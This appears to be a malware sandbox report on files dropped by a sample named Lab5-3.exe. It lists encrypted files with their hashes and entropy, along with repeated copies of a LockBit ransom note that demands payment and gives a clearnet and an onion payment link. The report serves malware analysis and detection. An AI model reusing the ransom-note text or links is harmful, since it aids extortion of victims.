                                                                                                          Preview:E......o..l..T...-FBJ.H@.^D-..~.;`...S..>.`.o..D.B.W..3..:.|.^.u.%.]..9*..4.*..c>~g.....0..B>..R;X...........5jO...t..@?.l..%.n.....D..#..pc'z.....P..W.,ZJ...a,sz..[. ......$+......@:=8..'[:#g.=.jP._....R`.Z\.,.6..".....\h...w...\...{.`.>X..7.@.;...qC,..F....E.\#.S.........qK..~7]....D"....."$k..D...v.U..^L...s....M...F.X.L*..z|.....P. .......J#1G4Q....D.........Vq2....6.]..=..W......[...........v$..[d.J\.>...5.p..'.....9|.O.~@/......n-.-?1..'.@.EJ.....f.H.;...G......A.9......G,.%q].mw8`...^GU.('<-!.....5f,.. I.".4....S.^..e"3:....}&..;..8..H5O.....pP..v.L...N..1...x....H..r<....S......;.....4Q.C..&..`...cMg....9..^T.;h...S.J. .O.z..v\............l.`V..w.....ei.g2?dn...>.D..>'...&....D....W..z.#.$.....f.%..,.L.....).'..p..0..6....@.o..`.My..#fy...l&H,.<..a...#..P.R.}.....!..'.....8.Gp.....0...eL..:.~c6...v.O.Z*....}........k....iM'....Iod..o.4'..!=T..4_.....k4/6b$.#`..E$.Y.>.l.r...|...<.."./....1.lf..k......^.4..1.{.cQ!.].....U.5...1.&./
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32752
                                                                                                          Entropy (8bit):7.994396983219719
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:KlMk7h1wiij3lZLFhZEZ69F0BT6fStyDqOHw6qcxLCvlshZ:EMkN1wiiZZLFY4U6YyG8XsOhZ
                                                                                                          MD5:3BA0DF8662CD5E2575D2D9C93565F77F
                                                                                                          SHA1:55612AF52CDA23EBA678AA6662A12DB82C7C17CB
                                                                                                          SHA-256:3835CA245CF1126D31D1576524865645D04E237BACEBC0FEA8355CFE3040999A
                                                                                                          SHA-512:32C14E7731B4919625EDFF00E0EDBF40E7560B94E25172095F51060E4C9DE3222D8303BFE186DD74F39530E37E3B9040E6C6B3A90EAEDC9F594221E3851EE088
                                                                                                          Malicious:true
                                                                                                          Preview:.....gt...iWU.....)\.n.......b.s......<.y{B..J..ZE.B{....kR'..>...c3.!.<........q....2A...=.#Zl.g.H........h.. hL.%..R...k&_.]|;.3..a_g.W..R.....F........T.b.pZ5.&.......x.[`.....F,v...=*.R.2.{...f.~....VLX...L.}D..7..Zm..'..\C..<.d[.A.5.Po..e.....y.I3f.....E...5d9.:u.|..Z..P5.k.z...*h.T....r}...:H....y..B.7.,...-#.qr.1....y.D..1J.Z.>.%iu.....9...`jOb...?Q.<._<T.nK.~....d..?.^..*b.X.xXLi....t+K..Ctm.H(...HE.\...w.4....o...C..,.......2).K@.*..._.zL...W.FuzG..W..t..y.g.1+.#.l.8..o.SL.C......m.D.4B..o.&7ni.h..x........L.G.E........O4...&...-.Q.z.P.wN.Z.U).}.g5i.U.PS[.p._..A..PU.n.....~m..X....&r...A...<. .q...w./>..i0.'3#...2....u.".2Q.....<..z|`.2..?\.*.?J.5...B]..QLf.j&..7..b..l=lLP..;^.8d.......9.`Y...7.....7....H..(.JI=N3.*.6.... .n|.b..]U.........._.,E8..6......}.....|...5k...a.6q.....`+..J7H.....*....#(...b.J.I.O.E..xz...x..d...........]....q.f...v.!..+..%....=vb.D.L..J5yz....n...-.n.......J.A3.........t....;.N..u..P.<1.F.'xI"...u...\.ox
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31040
                                                                                                          Entropy (8bit):7.994695999533076
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:yURuKrfJ/92Ui6khXr453zlATL7kto3UdvbX7ZZ:ywZxVCs53+TX6oU1LZZ
                                                                                                          MD5:AF204D40D2D7B8EA6409686D7F08B0A1
                                                                                                          SHA1:3C2F4F17EA5B387293277F13956E3674679CD8B7
                                                                                                          SHA-256:7AB89D507BDBB5A3CCE6376E066415D9FF350A74B03705F391D346379BFC3298
                                                                                                          SHA-512:C046904B4D5C28F97B8442571EF0596AB41D09AFE2EC9EEB99563E85CE0DE4A89D649C52D417BD9550C687C15AD2CEF08D5DADEAD664F1F6A1FA27E2E732C79B
                                                                                                          Malicious:true
                                                                                                          Preview:{4.OW.I_#..=j*>.[.D8...S.m1..`..&SZ.-{.>.4...l#G......0.=....'hF.b.=X)...G2p.8\,X.....6...)n..:9.......h....u.H...J.W.-......s..@..n.2....#O....J.....s.R....8..ko.r.xw]H.s...}....B.S8OU.{..4/...!...2....1..>y..#=Ln..x.#..wx..\C?yL.8.5....._..R.....4.I...or..x..c.....F;xgl.K..pi.].m2..$']....:.....i[...>..Q.1..iq..g.m+h......Zo}..I.Ls.;..>...pa./..N.n.|..;P{.@@.6..;.d[.....F...)...q~..Cb.2.......xT!.P.....C.....8...&...4Y.{."C.'.(z.c..:v....&0.of.-.NB.P..V.....|.$Q.W).;...P.o.T..i..I.&........]..JYX.di.jA)1...k..Y...........#.X....K..............3....`\1cy../..........Y...b.V.6X.I...rl....Lk.?=)..W..f.~2..I...V..Y...oM..,.7.....PyK+..r.u.Y.z..=.X..}J...k..5..oa..I.s..]....Q..<D..@I[9.5Z.X.4./y83U...AK....6.zg..I.....T.c;.T(....%`..cX.O.-....0=.....-._...Lp..~.c....!.Cb..e..Z.V>.....$...@*]..CU.=........-...,.~;.(.k.....+KZ.k..u..S.....8...>.p....B.....e&...&..1....J.._...IZN...e..I[tmW.t....w..e.%..[......*../.t.n.vY....V.....O....6.OD.s
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34352
                                                                                                          Entropy (8bit):7.99360027517051
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:SQSS2J2vMcYozFIqG2Jf1oED+PMGyr73b5By98UuaiC5y/TZ:SQSS2J2v/Q2JLEMGyrzbmyUua0/TZ
                                                                                                          MD5:A9EF07C94AC0D932EA6F5B53C7DF104B
                                                                                                          SHA1:30E5F7899AF1D7B467608D7C3BFB0084E1E89291
                                                                                                          SHA-256:D31F902BB11C8E8E3BB0DFBE26373A706BC6E658267C51C4CFD563529DE9A3E1
                                                                                                          SHA-512:8ECC7E989421D78C2FB135D6929E5E02B855C1C09BD7C70EC4F3215ECD08C9938532D35F5254C02FA7D149DE6F3E5F99942B03A324F89BA2D2E409934F3DA411
                                                                                                          Malicious:true
                                                                                                          Preview:...C..C..w....).O..5..s.O...h..f....>Y|0.s..%.`...s.h+.`..l..M....N.z.....M...<.Z.f~bOG` ......Z..@Y.n....7....R.....scDA....T+...b...F...jb...W.tF.krv .....J..._.H.LQ.}..W...NFV5.,S....5]"....r..3...k..o.m..sy........cIV.0.m..W4[.....'mu].C/..D..T..*.X%.;..hg.&...77*..}.\...g..[....O....`#.. j1.......l....d._.Q...2.m.L@.F._..mR..Om.d....*...i.f.B...X.....iv....d.>aZ...9..0...../b.O._..6W..0.2.A,z..X..?....*+cHC~.W..._..y..l.3....w.si.C...k.......E..s%..(Cx.a...U.:..ru.f.Jb...d.gYx..=$D...d....l.........L..u.i..+...P..d~..;h.pJk.....-......L.L.H.8...\9..z>{u.....j....6.T..tQO..C*K8m..........`.,...w<..9W....a,.NUR.G..N......n..CC...4.....{...$. A..5.d....].\.(R...<,c...y.w..%....?..e.Q...a.........F.rb..gA...U.q.D...&.`+.....+O.=....Y....y.8.+..)H..@..t...kt.*.W...[.u.0P.I........Q..y|.tJ.e...`d.Mm.....z:.jo...<4.......n.M.f...P.y..*....8.w*].Og.[...f...`vY.x..89NbhT3....M+.}O>.j.I..n....B...........M.y._./....2..._0.?x....R*.9/P... B......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28736
                                                                                                          Entropy (8bit):7.993805302040468
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:0WQ7mCaDmOexkFQsvjSVf0CmOWZMIpurM+ZQg/xZ:0WQ7mlJnFQs+2CmOWMcurMCQ8xZ
                                                                                                          MD5:6E3CDDF32A643C90C923291F36BDE357
                                                                                                          SHA1:C66877955370BAC28706C977A51039C3697AFB17
                                                                                                          SHA-256:2CEA5AB9B5E1311C9DCD072C2E8EA83B0A2F84620C70D0B676E4BF39D3F2BB2A
                                                                                                          SHA-512:008E6DA5824919BD4D1B9774041256800C1B4AE1FCC3D4E1EFFE246D63F31922DC61795BFB41C25DCDFCC39A33EEDACE95E07F1C0CD7868A3B75F651136AFD4B
                                                                                                          Malicious:true
                                                                                                          Preview:.e:`..VM_..d%.;........y..sg..Z..JfG..'....f+.q..B.....~...~.$J...........oi.el.....E..&..Q...WduV.......Em..n...W...<o...F_/..*.>.Y..6..!Lfn..?..^.)/...t...^SJ.....<E.....S...ws.r..............M.U.p%.=.%.......Nw`.}.s....r..v.h..[.5..^.K%..h..{....W...0o..?.4.}....0.{..b...r..F5=..Z.y.V.=v..&..R.J./............C.i..i5..G"x>....6.....|.s.F.RhC.-t...\.U..C'a...=...........@SZ.....=....!.D...mjjfd.x.)....5y...{g....*..Q7.....2..C.R.5..&@.n.X.s...[....o(..........p....iG...'(C..c-...C....T..F..=........^..H.f...+..F..S.....a.Lj......u.3.....l....'p.Z.._.,c.p..C.;.np..:Ju.~.c.B.>n...o..{q.=.S\.+.!.,.=.-..5.ajCpd.....B...,j8.s..J.. ..n.....b8'.B......c....'..d..R.V.ZOQ..".L.?*km..2..{.a.!....pl.c.. ...U..7..TW..8.iVg..<u.h.@*..y...#..L..$.(.v1D..d.....f.UqW..xn.........aW.aQY...Q.8...........G......!.au..../..Z.+.n.. 5.!PY..o_|.-.#g:T@W.^..........tR..,.)Y0)>.JQ0.K..MI.B......zs;..u....~^.~.....<...<x.6.)J.o..m-i....u..C_.W.1Y.Ha.y..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28736
                                                                                                          Entropy (8bit):7.993641819082458
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:OJLc1Rs/1pXGaxZwiLtf46IxGnqIV87eixgTLwnZw0boIIZ:4Lcg/TXG5iiqnRCeds0IIZ
                                                                                                          MD5:FB0DC52D6304A6361C5B6407908AF737
                                                                                                          SHA1:E26A4FFBB9F80626C3ADB71D1169B22FCD7EE3FD
                                                                                                          SHA-256:82D7AC49F20A5F2148BCB476DF15F335213BEE74BF5D6184DAFF7F379BC31F50
                                                                                                          SHA-512:BFF86CC7CB89215D3000A51F7DD7C239BBAB393A05D409DF3696F04B78A1862D89A6BFA2111A3CFCCF510E455AD60195DC1E24B0EEE77CF992D71D209FB499F9
                                                                                                          Malicious:true
                                                                                                          Preview:....F.j{b/..6.r..Zj...NySm5...#.EwY...c..).t.r.,U....j.H..Joj\.'.*....C.....p....p.Z.<........=.3..R..}...S.N.c.......>..M:9......5.>......!-.M.r.0...1H.si@G...|.\....S..=..^.K...Wf.*zX...^!uHMb..-t....o..u...!.d.a...u!{J....]U.0|.q.....{.:..w.H....../....h..H'Dy.[....p.s.jaP.N!..l.8.x.......J.1....RW....2M.;...s.T.....6gBe...A....T.....`/.........Jq8.FP-.L.D.....f@..8.vl..L+(..U...A*A.9.)..BO..w...Y........^....D.NN..])5.-.$.C"x{....P.a.g."..oH..z....z..z...5|......vb.3....f..7..x.!...w`.cI.D........|.n.Y........-.....F.6-.B!.;K.+....xm..66.=E..\ckc.9.'.Rs...$..l.k/..N,Um.F......._....g3%G"..*.l............V.J.....?F.gb..`f.T...Dz.j.Ll...F......'.f..a.TW.Hvs..ZLwj...0..pe....:"p....Q.'C&..!7 D.K.../.y..VxN..o..>5.G7,..p...r.K..1..|D...?.h..Hh.k..;.9R.ku...48)v.G.'}B.u9........X......cJj.2.......y#i.3.Q@.E.YJ.{....._B...0.j...Sfe@....).".S...?.F2....#.EY.a2.....s4..k~]..j...ghl).....?..;T...].....v..~ ..w.....0...!t...1Qb.lH..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28736
                                                                                                          Entropy (8bit):7.992950044604992
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:xsftZObRjapej8YtOwU17daGbwh1hxdR8fQflZVZ:4tAbRmp+swm/yxdufQZ
                                                                                                          MD5:3B9851B0353390F896D539AF3895D23F
                                                                                                          SHA1:051DF1613BF669B863D7444FD8DBDFDE65DDEC13
                                                                                                          SHA-256:40974E83768B5DD2E30FC4532C778F41F9692482D3F44292CDF0B5D5D8E8D847
                                                                                                          SHA-512:6F651F24AD82432373569ADA0E28C02439430BD7C67A37614ED9A5279C4F7253D3D20BD4501AC3F82D7B52D6819658FF17AA73080BA280E3E5161CAA005B0132
                                                                                                          Malicious:true
                                                                                                          Preview:.mt...sT.s...7...@...@...."YL..I..Bcq...6.!.Z.....F...l..#.'..2..2|e.Z.....:....r}.F...-....g..:(Q..1.Q.`X......|\../;].5..-y.J>FbJ`I$...?...Tg%:.l$..Q-<,..Lp'....M w..T..&..6..;P1.o!..#Hc.......@.(...?..2..<.n$.z..."......... ...E'...m.Rrz.G.w...!$....p....H}S./.j.G........N<./..[....3I4.......a.J.]..=...m%.X.TR....X.^D..r.^.f._..L;.m.i.}z...$.......a...\...q.j.....f8...M*...o;.Lw..p_h1+..V.}..Xx-...H.u.......M....S...w...62c..Q.t*.?..wT...g.C.5.,7.v.)...3.^^..!..L.....%|w.c.......G.... /..X.......:.....h-K..,o.V.4...Pc..>i.....d..]Q~...`l.<0.K..i.2.c.E/..JNk.`&....>q....^|W.....?.[.e.{,.....H.S.9.....#..b.T~E.ONA^..=a~......w...g..Cg..k.shEs...*..<^.......aT}n]NB}..x...../uo....@.t......6..I5......4P02....SUy.}....Q..q...p.......R6,..^).l.b...S.....E.,uy...bKB.'D..Z.p....7...a...A[.qV.!...}z.dPG.Y.i..qE.I0.u...R.y}..Y...$.<#g....xW....Q.b.Xr....~......c+.._.D..,..,......../T..b.5.?.a.e.....(R.|.J[<.I..*.q..\.....J.f.*7.;....J..hZth.5.>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28736
                                                                                                          Entropy (8bit):7.9932129573357935
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:65CpcKKgULvE6YJVOpo8XhcEtTw4VPjaPIZ:4CGVgAHYJVORcEZw+PbZ
                                                                                                          MD5:5E49F7E3C1A6F8D04E52B05EF26BF1C7
                                                                                                          SHA1:D333BAA593835BC5E2F30495E7193356C87EC2AB
                                                                                                          SHA-256:B874AECE219F73C04E363441BDEC7F685CB9B7CCC1D3F4A8C4D839F486466B92
                                                                                                          SHA-512:9319CF3B557FA2905BCDBCE82D268E960C564644C1FBA7CEC73E6C2B409C9AEB29EA02002206F6145C390073ADEBFA610E6E1EE09EF547E85A87262D2E25609E
                                                                                                          Malicious:true
                                                                                                          Preview:}(...........F3.\.N...t..<.L..U@..W......#.Rpi.}.g.....k..s.T..Qf.......M.L.W.}......O{5..s?.@(.#.s.....x........Vg.!.k..u.,m.X.....>.*..vu.....3-@..."...P.?.......S....+.6..8..j.....S.OjF......._..y..~F......L.9........T...u...&t....L.M..y....p7..f.."B|.cM.\._4...G...B'.ke..O. ..S...,.......}x....L..X..@..3..D.M~.CL2..K...[.....L(...7.0....k....y.....[$ \|..T.B......g.2"..2<.9q.(Q....0.h...T...6.k......7R...)4Y.J.......X.}?.n:".*9..2..s..@...O...$.........Nj.....d.,m .w....P.0-U.&3...x.>...N.:.y{V..../.KU...4..d.fK.......!sc.KcO..D.....l.3\.......%.5.#.(4d...M.%'[r...N2.gxh2.......G..f...f&.uH.W.}0...?y"-..!bs.z4......E.Zu...f.....l2...Y.i....F.V.../.F...I I....(.. ..88.q".Q.C,....k....R....gQ...W..D@....\..k.p....|ChC.O..vd.....-...r.yy`..n.s...:&U.6$.x9)|q\...MK....C.i...K.T.Z.."..'..ao%...o..6d T..M...g....B.............%......t..A ..!..&....:.j....+.........{....u.f....p.d...h..}c........0.h......u..|........).^.V.2...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
